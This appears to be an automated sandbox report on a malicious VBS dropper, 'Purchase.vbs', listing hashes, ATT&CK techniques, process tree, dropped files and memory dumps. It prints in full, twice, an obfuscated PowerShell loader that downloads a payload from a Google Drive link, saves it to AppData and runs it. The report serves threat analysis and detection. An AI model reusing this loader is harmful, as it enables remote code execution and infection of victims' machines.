126e8204b6044a3bdb1d885cc462376377a3165d2c572de086baaa715f49ae9e

General

Target

Purchase.vbs
Size

105KB
MD5

09306e3d4884937ef15a686ee4aa1412
SHA1

dbdd7b1b1829232b4ff385fa5b98b5c3d7553fe2
SHA256

126e8204b6044a3bdb1d885cc462376377a3165d2c572de086baaa715f49ae9e
SHA512

9bf6ef2011b3d162142df67496e844d49f12ada62d5c0545070eb43034a01ee7cc3197e21448c70c1b0d918f773e6ef89940c3198288298c93ed36f5cf08fb22
SSDEEP

3072:C7UtxD30yAV1bePHvAVXJLlkGYmp47L+7OpkPWa2Ot:C7Utl0yAvbePHvAtJLlbJp47LSABa2Ot

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 4272 WScript.exe
10 2064 powershell.exe
13 2064 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

9 drive.google.com
10 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1740 4080 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

2064 powershell.exe
2064 powershell.exe
4080 powershell.exe
4080 powershell.exe
4080 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2064 powershell.exe
Token: SeDebugPrivilege 4080 powershell.exe

flow	pid	process
4	4272	WScript.exe
10	2064	powershell.exe
13	2064	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
9	drive.google.com
10	drive.google.com

pid	pid_target	process	target process
1740	4080	WerFault.exe	powershell.exe

pid	process
2064	powershell.exe
2064	powershell.exe
4080	powershell.exe
4080	powershell.exe
4080	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4272 wrote to memory of 2064	4272	WScript.exe	powershell.exe
PID 4272 wrote to memory of 2064	4272	WScript.exe	powershell.exe
PID 2064 wrote to memory of 3276	2064	powershell.exe	cmd.exe
PID 2064 wrote to memory of 3276	2064	powershell.exe	cmd.exe
PID 2064 wrote to memory of 4080	2064	powershell.exe	powershell.exe
PID 2064 wrote to memory of 4080	2064	powershell.exe	powershell.exe
PID 2064 wrote to memory of 4080	2064	powershell.exe	powershell.exe
PID 4080 wrote to memory of 2520	4080	powershell.exe	cmd.exe
PID 4080 wrote to memory of 2520	4080	powershell.exe	cmd.exe
PID 4080 wrote to memory of 2520	4080	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Purchase.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smalsavs = 1;$Benzoylated='Substrin';$Benzoylated+='g';Function Antipeptone($Sprjtepistolens){$Unpathed=$Sprjtepistolens.Length-$Smalsavs;For($Moppy=4; $Moppy -lt $Unpathed; $Moppy+=(5)){$Marchellas+=$Sprjtepistolens.$Benzoylated.Invoke($Moppy, $Smalsavs);}$Marchellas;}function Bllehattens($Guacico){. ($Frastdnings) ($Guacico);}$Sumption=Antipeptone 'NoveM.ljloBlokzSan iSadelDichlMiauaEl,e/Afkl5Ri s.Zymo0Minb Tab(AfplWsubai.ejlnLa.gdReteoA,tewPyntsdil. DebNFo.bTC,ti Fiss1Repl0 Pr .N nu0 Brn;Sej, DistWhldniS nsnKorp6Hull4Ki h;Ner. SphaxFlad6Aflb4posi; bor notirbre vDet,:Tra 1Sett2Tabe1Be i.stik0 F,n)Ankr TidG AaneHoitc InckK.looJdes/Chep2Toot0Evig1besy0Tale0Besk1Over0 Per1Stri DrueF.toni TourSammeLingfAttroBeg,xEmbr/Anar1 Fla2Avow1 Co..Voco0 Fem ';$Vertikalernes=Antipeptone 'HjlpUD,nds epte lsr tra- bagAPursg.isbe.ctonUndet Rme ';$Humanisation178=Antipeptone 'BerghMarotTarktM.nip L.nsN tu: D,k/Sa o/IndkdOmgar ModiMe.yv adieDebr.SleegHorsoUnstoPresgFer.lsongeDeni.,weicSkefoEtapmc no/LivsuFlauc Drb? araeIso xTr,lp OrloHis.rSyndt Ski= Cl dSafroRudewWavin ,hel T.loBlokaKan,d.lan&Raadi LbedDaym=Week1AfmaFNo zq CliUS,okZ EdunStikf Fral,ith6 DivAstamhMandzsec,1 Obl_UnirX onv7 ,yndSejlwSubii,ndiAeth,3OnyxS AnniQ.icUV.ndNTatt-ApreMEkstf,uescWaitfForeRWe.gRDrifGRin ';$Hindbaer=Antipeptone 'So,e>Ding ';$Frastdnings=Antipeptone 'Can,i Skie RobxP.rs ';$Foeticidal = Antipeptone 'Is,geVandcRoulhNa io ona Svmm% DelaforapKendp Sted.oksaAngutCaldaBa t%Tink\SlinD RenaTe rn Cans FabeMavekSub,oAgorm,encpAllea Tragk apn SysiEufoeDemotEvak.slbeSConvyeftesD.si Jak& .le& tu diapeE hec HalhVau.oB gg F.rg$Jo,e ';Bllehattens (Antipeptone 'Skar$lu.hg Sanl Curo RenbSleia Jewl ulc:Dup.PMarksSlideEstau.udidIndeo CoerUdspeBrodm RejiunrenJa eiPes sWindcLageeDagsnPebectra,eEle =Hjem(CliccFlatmWo.ddKryo Anns/Dublc.urb S,db$smidF,andoOccie.isetFlytiEdifc Masi itedTri,a ReklAbsc)Over ');Bllehattens (Antipeptone 'Regn$Bi.ig S nl.otpoFrugbAnw.aSerulBran: GesAGr naGenfrD.vosGuankChaio magrAfnat Dan9Bere9Subl=Fibe$Pal,HSlvfuGrshmWadmaV len DeviTra s,achaTr,st T oiTeamoPreanFull1Rewa7nebu8Tit..Abils Ap,pPi clGenei G,ztRuna(Udli$TallH arri o kn SpodHunkbElutaHelteOestrKoll)Re i ');$Humanisation178=$Aarskort99[0];Bllehattens (Antipeptone ' Ban$UnshgT,pil kl.o SerbHyp,a misl.imw:CyklSCalyiRen.mFr.ga SemrOberuParnb S,gavigts Mas=BlocNUdvaeoxypwJ.rd-ColeOBelebMu.ijSolie,etrc Mart,npr RastSStnkyImprsPtyatFodteVejrmkny,.retrN HaneAd itB,yf..itrWjudie.esobCollC KldlStudibnneeJnetnStrktS,ut ');Bllehattens (Antipeptone 'loka$ enSBis iDia,mSugeaStudrRejsuPulpb RebaSkovsLign. ,veHno.ce rugaSmerd nteeLangrDagrs,ulp[Best$UnreVSkraeUdlir GeotStikiSwisk AdraBaallTrise utbrNum.nAsieeSex,sIndi]Over=Unme$CutiSMi luTor,m Fr,pStamtlommiCensoPrefnOcci ');$Fetichdyrkernes=Antipeptone 'Bra.SVedliS bomDo oa Pser NonuVirtbi.puaStudsSupe. Sk,D betoTropwwar.nHypel t,toRonnaRotadF,liFLa.diBronlNonmeVold( Vaa$ latHOsetu,rtemmageaAffanAtt i BrnsfedeaBiortDyspiHa koDun,nAff,1Subj7Bjar8 Ini,Brat$ FordSkipe bdkk,anduRenmpS.ltrSalmeCarbrChaz)Tenn ';$Fetichdyrkernes=$Pseudoreminiscence[1]+$Fetichdyrkernes;$dekuprer=$Pseudoreminiscence[0];Bllehattens (Antipeptone 'Repo$ ovgl,edlMathoOks.bBaskaDisolKast:ReubDOrane ortsGloseMineaPerfm Hng=Skre(.obeT Fi eWeass Ta,t rej- CalPSprya,ekstObsehVedr .rf$Overd,roleNeg,kB.udu Sydp Acer.unieUnderPib.) Unt ');while (!$Deseam) {Bllehattens (Antipeptone 'Stra$ ,regbro,lLyknoChasbRegnayarilGrdf:DommRMyste.ermgFo piPascsBrnet syle V,drOvereUdmat Knis Hed=Trag$ eirtGreerKredurublelogi ') ;Bllehattens $Fetichdyrkernes;Bllehattens (Antipeptone 'Sto.S InttCalaaSmudrBouct av-DdsdSUnimlSupee OffeympepRero Pap4 Tar ');Bllehattens (Antipeptone 'Tilf$Leergdactl ModoHa ubaritaOrfdlSek :U.trD TypePoinsTypeej mfaDia,mFlyv=Klkk(WheaT,houeLakfsTirstE,ic-Be sPReduaUnsutHe,vhVehe For$ hutdPerseTrykkPeriuNoncpBiblrontoeK,ndr Uni)Styr ') ;Bllehattens (Antipeptone 'Knea$SkrigUreglFirto,ngab RejaPre,l Bro:Ar.eLFuldeFlagdWelssStam=Bort$F,regwatelChaposkilbRippaUrrelTaal:QuidMTisso Viru omnnFor,tya.syEls,+Dueu+Klim% ,el$ PosACoreaH nerGn,vsPiackOutgoUdlarTilrt Jas9 p.r9Flax.sproc Modo Sk.uPlacnIkrat.amp ') ;$Humanisation178=$Aarskort99[$Leds];}Bllehattens (Antipeptone 'Morg$HomigCarrlSkraoBehebKobbaKololOver:DoxofS ypaHaggcS.elt .eliTurnoacrouHaftsBouglNickyduro ,ev= Hig EmbeGmaskeMo,ttK.nt-LjpeCCya,o aagnEjakt GeneMaa,nPosttBars Mora$Statd KnuePrytk.triuE,fop AmmrBambeBud,r kal ');Bllehattens (Antipeptone ' Mar$Fl.vgOrd.l Bl,oNonsbMe aaBreflGrif:TetrS VirpGensrKorsiOrdsnMorugNordlS,ara Trag QueeKeefnPsite S,btSi,n Othe=Fres Foru[For,SSu ayagugsSammtMonueSys,m Ve..RadiCPharoNatunU,vivUncoe VenrBugstMe.e]Bror:Goni:spriFKa,frInteo,aywmKinsBOrdnaRestsPeoneUnde6Regu4KlasSUn ptSik,rmethiJe nnAtypgAstr( unm$Teltf DenaStracFis.tSkruiMulto,ankuGasusBogplTrepy T,v) Ove ');Bllehattens (Antipeptone 'Buti$ Kapg midl.knno,rifboutca Deblaabe:De aT.anae Te lMa seti,gfStknoSupenKonjsS,efeAstmlchoksEmbrkLepraSo.tbKrumeToogrJacknLeukeTelf Subs= I f Over[FrekS Kony A.asSkultHamieBo,lmF us.StemTUnwoeNondx Brot Gen.,rmaEextenInflc T.moYachdPaadi.ontnAutog nds]Sols:Shaw:PockASpekSp,asCundeIHareIUnin. DorGHabiePcgttD.unSklimtSyllr.eneiAlodn.eleg Tje(E.tr$.tudSSubap IntrSmagi PinnDrivgKa.nlHavvaIn.ig ,areBeknnAnlgeb ontAbou) Min ');Bllehattens (Antipeptone 'Grum$ A,lg SublRteboGehebSlava.ilelAnti:PalaSMu atMange Bl.mindbmSha eBinosAnt.a,ismmL.ndlIn re,porrOoloe rkesSnar= Suk$,ontT KlaeRo,ll StreSkygfMib o Pe n AndsGruneLejllBrugs Devkde oaOutqbTeoreAccer unsnDrpleIn.d.BenzsFremu eltbHa,msCeret S.mr AtoiNonpnGrafgPuer(ms.i3Uni,1Cabl6Ulve1Brke1Genn6Gang,Sign2T.tr6 Per4 Art2Und,1Prog)Isog ');Bllehattens $Stemmesamleres;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dansekompagniet.Sys && echo $"
3⤵
PID:3276

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smalsavs = 1;$Benzoylated='Substrin';$Benzoylated+='g';Function Antipeptone($Sprjtepistolens){$Unpathed=$Sprjtepistolens.Length-$Smalsavs;For($Moppy=4; $Moppy -lt $Unpathed; $Moppy+=(5)){$Marchellas+=$Sprjtepistolens.$Benzoylated.Invoke($Moppy, $Smalsavs);}$Marchellas;}function Bllehattens($Guacico){. ($Frastdnings) ($Guacico);}$Sumption=Antipeptone 'NoveM.ljloBlokzSan iSadelDichlMiauaEl,e/Afkl5Ri s.Zymo0Minb Tab(AfplWsubai.ejlnLa.gdReteoA,tewPyntsdil. DebNFo.bTC,ti Fiss1Repl0 Pr .N nu0 Brn;Sej, DistWhldniS nsnKorp6Hull4Ki h;Ner. SphaxFlad6Aflb4posi; bor notirbre vDet,:Tra 1Sett2Tabe1Be i.stik0 F,n)Ankr TidG AaneHoitc InckK.looJdes/Chep2Toot0Evig1besy0Tale0Besk1Over0 Per1Stri DrueF.toni TourSammeLingfAttroBeg,xEmbr/Anar1 Fla2Avow1 Co..Voco0 Fem ';$Vertikalernes=Antipeptone 'HjlpUD,nds epte lsr tra- bagAPursg.isbe.ctonUndet Rme ';$Humanisation178=Antipeptone 'BerghMarotTarktM.nip L.nsN tu: D,k/Sa o/IndkdOmgar ModiMe.yv adieDebr.SleegHorsoUnstoPresgFer.lsongeDeni.,weicSkefoEtapmc no/LivsuFlauc Drb? araeIso xTr,lp OrloHis.rSyndt Ski= Cl dSafroRudewWavin ,hel T.loBlokaKan,d.lan&Raadi LbedDaym=Week1AfmaFNo zq CliUS,okZ EdunStikf Fral,ith6 DivAstamhMandzsec,1 Obl_UnirX onv7 ,yndSejlwSubii,ndiAeth,3OnyxS AnniQ.icUV.ndNTatt-ApreMEkstf,uescWaitfForeRWe.gRDrifGRin ';$Hindbaer=Antipeptone 'So,e>Ding ';$Frastdnings=Antipeptone 'Can,i Skie RobxP.rs ';$Foeticidal = Antipeptone 'Is,geVandcRoulhNa io ona Svmm% DelaforapKendp Sted.oksaAngutCaldaBa t%Tink\SlinD RenaTe rn Cans FabeMavekSub,oAgorm,encpAllea Tragk apn SysiEufoeDemotEvak.slbeSConvyeftesD.si Jak& .le& tu diapeE hec HalhVau.oB gg F.rg$Jo,e ';Bllehattens (Antipeptone 'Skar$lu.hg Sanl Curo RenbSleia Jewl ulc:Dup.PMarksSlideEstau.udidIndeo CoerUdspeBrodm RejiunrenJa eiPes sWindcLageeDagsnPebectra,eEle =Hjem(CliccFlatmWo.ddKryo Anns/Dublc.urb S,db$smidF,andoOccie.isetFlytiEdifc Masi itedTri,a ReklAbsc)Over ');Bllehattens (Antipeptone 'Regn$Bi.ig S nl.otpoFrugbAnw.aSerulBran: GesAGr naGenfrD.vosGuankChaio magrAfnat Dan9Bere9Subl=Fibe$Pal,HSlvfuGrshmWadmaV len DeviTra s,achaTr,st T oiTeamoPreanFull1Rewa7nebu8Tit..Abils Ap,pPi clGenei G,ztRuna(Udli$TallH arri o kn SpodHunkbElutaHelteOestrKoll)Re i ');$Humanisation178=$Aarskort99[0];Bllehattens (Antipeptone ' Ban$UnshgT,pil kl.o SerbHyp,a misl.imw:CyklSCalyiRen.mFr.ga SemrOberuParnb S,gavigts Mas=BlocNUdvaeoxypwJ.rd-ColeOBelebMu.ijSolie,etrc Mart,npr RastSStnkyImprsPtyatFodteVejrmkny,.retrN HaneAd itB,yf..itrWjudie.esobCollC KldlStudibnneeJnetnStrktS,ut ');Bllehattens (Antipeptone 'loka$ enSBis iDia,mSugeaStudrRejsuPulpb RebaSkovsLign. ,veHno.ce rugaSmerd nteeLangrDagrs,ulp[Best$UnreVSkraeUdlir GeotStikiSwisk AdraBaallTrise utbrNum.nAsieeSex,sIndi]Over=Unme$CutiSMi luTor,m Fr,pStamtlommiCensoPrefnOcci ');$Fetichdyrkernes=Antipeptone 'Bra.SVedliS bomDo oa Pser NonuVirtbi.puaStudsSupe. Sk,D betoTropwwar.nHypel t,toRonnaRotadF,liFLa.diBronlNonmeVold( Vaa$ latHOsetu,rtemmageaAffanAtt i BrnsfedeaBiortDyspiHa koDun,nAff,1Subj7Bjar8 Ini,Brat$ FordSkipe bdkk,anduRenmpS.ltrSalmeCarbrChaz)Tenn ';$Fetichdyrkernes=$Pseudoreminiscence[1]+$Fetichdyrkernes;$dekuprer=$Pseudoreminiscence[0];Bllehattens (Antipeptone 'Repo$ ovgl,edlMathoOks.bBaskaDisolKast:ReubDOrane ortsGloseMineaPerfm Hng=Skre(.obeT Fi eWeass Ta,t rej- CalPSprya,ekstObsehVedr .rf$Overd,roleNeg,kB.udu Sydp Acer.unieUnderPib.) Unt ');while (!$Deseam) {Bllehattens (Antipeptone 'Stra$ ,regbro,lLyknoChasbRegnayarilGrdf:DommRMyste.ermgFo piPascsBrnet syle V,drOvereUdmat Knis Hed=Trag$ eirtGreerKredurublelogi ') ;Bllehattens $Fetichdyrkernes;Bllehattens (Antipeptone 'Sto.S InttCalaaSmudrBouct av-DdsdSUnimlSupee OffeympepRero Pap4 Tar ');Bllehattens (Antipeptone 'Tilf$Leergdactl ModoHa ubaritaOrfdlSek :U.trD TypePoinsTypeej mfaDia,mFlyv=Klkk(WheaT,houeLakfsTirstE,ic-Be sPReduaUnsutHe,vhVehe For$ hutdPerseTrykkPeriuNoncpBiblrontoeK,ndr Uni)Styr ') ;Bllehattens (Antipeptone 'Knea$SkrigUreglFirto,ngab RejaPre,l Bro:Ar.eLFuldeFlagdWelssStam=Bort$F,regwatelChaposkilbRippaUrrelTaal:QuidMTisso Viru omnnFor,tya.syEls,+Dueu+Klim% ,el$ PosACoreaH nerGn,vsPiackOutgoUdlarTilrt Jas9 p.r9Flax.sproc Modo Sk.uPlacnIkrat.amp ') ;$Humanisation178=$Aarskort99[$Leds];}Bllehattens (Antipeptone 'Morg$HomigCarrlSkraoBehebKobbaKololOver:DoxofS ypaHaggcS.elt .eliTurnoacrouHaftsBouglNickyduro ,ev= Hig EmbeGmaskeMo,ttK.nt-LjpeCCya,o aagnEjakt GeneMaa,nPosttBars Mora$Statd KnuePrytk.triuE,fop AmmrBambeBud,r kal ');Bllehattens (Antipeptone ' Mar$Fl.vgOrd.l Bl,oNonsbMe aaBreflGrif:TetrS VirpGensrKorsiOrdsnMorugNordlS,ara Trag QueeKeefnPsite S,btSi,n Othe=Fres Foru[For,SSu ayagugsSammtMonueSys,m Ve..RadiCPharoNatunU,vivUncoe VenrBugstMe.e]Bror:Goni:spriFKa,frInteo,aywmKinsBOrdnaRestsPeoneUnde6Regu4KlasSUn ptSik,rmethiJe nnAtypgAstr( unm$Teltf DenaStracFis.tSkruiMulto,ankuGasusBogplTrepy T,v) Ove ');Bllehattens (Antipeptone 'Buti$ Kapg midl.knno,rifboutca Deblaabe:De aT.anae Te lMa seti,gfStknoSupenKonjsS,efeAstmlchoksEmbrkLepraSo.tbKrumeToogrJacknLeukeTelf Subs= I f Over[FrekS Kony A.asSkultHamieBo,lmF us.StemTUnwoeNondx Brot Gen.,rmaEextenInflc T.moYachdPaadi.ontnAutog nds]Sols:Shaw:PockASpekSp,asCundeIHareIUnin. DorGHabiePcgttD.unSklimtSyllr.eneiAlodn.eleg Tje(E.tr$.tudSSubap IntrSmagi PinnDrivgKa.nlHavvaIn.ig ,areBeknnAnlgeb ontAbou) Min ');Bllehattens (Antipeptone 'Grum$ A,lg SublRteboGehebSlava.ilelAnti:PalaSMu atMange Bl.mindbmSha eBinosAnt.a,ismmL.ndlIn re,porrOoloe rkesSnar= Suk$,ontT KlaeRo,ll StreSkygfMib o Pe n AndsGruneLejllBrugs Devkde oaOutqbTeoreAccer unsnDrpleIn.d.BenzsFremu eltbHa,msCeret S.mr AtoiNonpnGrafgPuer(ms.i3Uni,1Cabl6Ulve1Brke1Genn6Gang,Sign2T.tr6 Per4 Art2Und,1Prog)Isog ');Bllehattens $Stemmesamleres;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dansekompagniet.Sys && echo $"
4⤵
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 2288
4⤵
- Program crash
PID:1740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4080 -ip 4080
1⤵
PID:1696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suyjklzc.hhf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Dansekompagniet.Sys

Filesize
446KB

MD5
eddcec82926ca68f594839adf5cf1cfb

SHA1
b88ed323c024dc81b64f30bc632e1d1721d518ef

SHA256
012037effd302f371def9257927991dccfd7c8edf60afacaead9dfc7d8340589

SHA512
10566492a25904bca962a7026aacc690e7804625ee350df8c87ab4e466c1eb13495b06342b0bd8d2854b5c88a3716d8cda8c606d65ab6497dc386a01721ef944

Download Submit
memory/2064-2-0x00000209C69E0000-0x00000209C6A02000-memory.dmp

Filesize
136KB

Download
memory/2064-12-0x00007FFFF81B0000-0x00007FFFF8C71000-memory.dmp

Filesize
10.8MB

Download
memory/2064-13-0x00000209AE3F0000-0x00000209AE400000-memory.dmp

Filesize
64KB

Download
memory/2064-14-0x00000209AE3F0000-0x00000209AE400000-memory.dmp

Filesize
64KB

Download
memory/2064-17-0x00000209AE3F0000-0x00000209AE400000-memory.dmp

Filesize
64KB

Download
memory/2064-46-0x00007FFFF81B0000-0x00007FFFF8C71000-memory.dmp

Filesize
10.8MB

Download
memory/4080-24-0x00000000057C0000-0x0000000005826000-memory.dmp

Filesize
408KB

Download
memory/4080-36-0x0000000005E30000-0x0000000005E7C000-memory.dmp

Filesize
304KB

Download
memory/4080-22-0x0000000005580000-0x00000000055A2000-memory.dmp

Filesize
136KB

Download
memory/4080-23-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/4080-20-0x0000000004850000-0x0000000004860000-memory.dmp

Filesize
64KB

Download
memory/4080-34-0x0000000005830000-0x0000000005B84000-memory.dmp

Filesize
3.3MB

Download
memory/4080-35-0x0000000005DF0000-0x0000000005E0E000-memory.dmp

Filesize
120KB

Download
memory/4080-21-0x0000000004ED0000-0x00000000054F8000-memory.dmp

Filesize
6.2MB

Download
memory/4080-37-0x0000000007470000-0x0000000007AEA000-memory.dmp

Filesize
6.5MB

Download
memory/4080-38-0x0000000006370000-0x000000000638A000-memory.dmp

Filesize
104KB

Download
memory/4080-39-0x00000000070A0000-0x0000000007136000-memory.dmp

Filesize
600KB

Download
memory/4080-40-0x0000000007030000-0x0000000007052000-memory.dmp

Filesize
136KB

Download
memory/4080-41-0x00000000080A0000-0x0000000008644000-memory.dmp

Filesize
5.6MB

Download
memory/4080-18-0x0000000004860000-0x0000000004896000-memory.dmp

Filesize
216KB

Download
memory/4080-43-0x0000000074EC0000-0x0000000075670000-memory.dmp

Filesize
7.7MB

Download
memory/4080-19-0x0000000074EC0000-0x0000000075670000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing